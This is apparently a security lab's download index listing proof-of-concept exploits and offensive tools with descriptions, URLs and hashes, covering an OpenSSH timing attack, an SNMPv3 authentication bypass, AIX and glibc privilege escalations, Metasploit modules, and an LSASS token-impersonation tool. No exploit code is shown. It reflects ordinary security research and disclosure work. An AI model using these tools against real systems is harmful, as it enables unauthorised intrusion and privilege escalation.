CVE-2003-0190 PoC
Proof of Concept for CVE-2003-0190: timing attack on OpenSSH-portable <= 3.6.1p1 with PAM.
- http://lab.mediaservice.net/code/ssh_brute.c
MD5: 4fbc9a1fb23e828b1fe42ff7cc65d1c1
SHA-1: b57f20c0a86c20cda82e8dc169923452fc50225c
- http://lab.mediaservice.net/code/openssh-3.6.1p1_brute.diff
MD5: de3bc1148b93ddb427f6fc721d08a1c0
SHA-1: 9cf2b8a9bcb5e526c071f18e4bd3be5c5b716e35
CVE-2008-0960 Exploit
Proof of Concept for CVE-2008-0960: allow you to bypass authentication on SNMP v3 (tested on CISCO and Net- SNMP) via HMAC validation error.
- http://lab.mediaservice.net/code/snmpv3_exp.tgz
MD5: 8b361d84155829c8b08e4342f8db6aa2
SHA-1: 4f011d1dae3b28611700b2e66158ba572d4673a6
CVE-2009-2669 Exploit
A certain debugging component in IBM AIX 5.3 and 6.1 does not properly handle the (1) _LIB_INIT_DBG and (2) _LIB_INIT_DBG_FILE environment variables, which allows local users to gain privileges by leveraging a setuid-root program to create an arbitrary root-owned file with world-writable permissions, related to libC.a (aka the XL C++ runtime library) in AIX 5.3 and libc.a in AIX 6.1.
- http://lab.mediaservice.net/code/raptor_libC
MD5: 76e604345f2e99e39c7638ebf04d985d
SHA-1: 4c5b8c3876db39d2c6664adf8892f139f1fbb2b3
CVE-2010-3856 Exploit
ld.so in the GNU C Library (aka glibc or libc6) before 2.11.3, and 2.12.x before 2.12.2, does not properly restrict use of the LD_AUDIT environment variable to reference dynamic shared objects (DSOs) as audit objects, which allows local users to gain privileges by leveraging an unsafe DSO located in a trusted library directory, as demonstrated by libpcprofile.so (CVE-2010-3856).
- http://lab.mediaservice.net/code/raptor_ldaudit
MD5: 8258ca708474ed86adb154c899bb1c12
SHA-1: a18a591faff0382ac3a54522acf3ee709e3b7d44 - http://lab.mediaservice.net/code/raptor_ldaudit2
MD5: cce9edfc7ff62c900a5aff57a50caf2b
SHA-1: 3761f7987e39960d329c1bfa7e80f3c90c0c04ec
Cachedump - Metasploit Module
Cachedump post exploitation module for Metasploit.
- http://lab.mediaservice.net/code/cachedump.rb
MD5: 7676ddb35782a51da4ad6570234cfe44
SHA-1: 8448cb6db982d767f37866d37d1b9d9645cf6339
Juniper Secure Access URL decoder/encoder
Juniper "Mask hostnames while browsing" URL decoder/encoder (DanaInfo or url variables).
- http://lab.mediaservice.net/code/junidec.c
MD5: 94424ac3e1e33dfe67031818b43b3319
SHA-1: 2a48898d9dc3ef4c5e6861c2fa487e97b43b9f85
RunAsUser v0.5
RunAsUser uses DLL injection techniques to gain SYSTEM privileges abusing the LSASS.EXE process, then it duplicates the security token of the target process and runs an arbitrary program, effectively impersonating the owner of the target process.
- http://lab.mediaservice.net/code/RunAsUser.zip
MD5: 32872e88252169d3a1f25455f8480ec3
SHA-1: f84883a463b12427b438213326e57a465fccd973
Singsing
Singsing is a SYN scan library, small, fast and compatible. From the core engine, the asyncronous SYN scanner zucca has been born.
- Singsing project page
http://lab.mediaservice.net/code/singsing/
SIP digest leak - Metasploit module
Metasploit module for the SIP digest leak discovered by EnableSecurity. By sending a fake call to a phone, when the user hangs up a BYE message is sent back. If the reply is a 401/407 message the phone will send a second BYE with the digest token.
- http://lab.mediaservice.net/code/sip_digest_leak.rb
MD5: 2a15b976098f1c42f60107e03d110089
SHA-1: e297d4b1fa12cc9bf5f78f31aaf9efa261eea7ff
WarVOX patch
iaxrecord (warvox 1.0.1) patch to enable the use of test mode of iaxclient library (needed 2.2.x), you will not need an audio device anymore.
- http://lab.mediaservice.net/code/iaxrecord_patch.diff
MD5: f131f03ba5a877ace17329ba2d40cb85
SHA-1: e622316c7345d47d846dfb98d8ddaa055f2154c2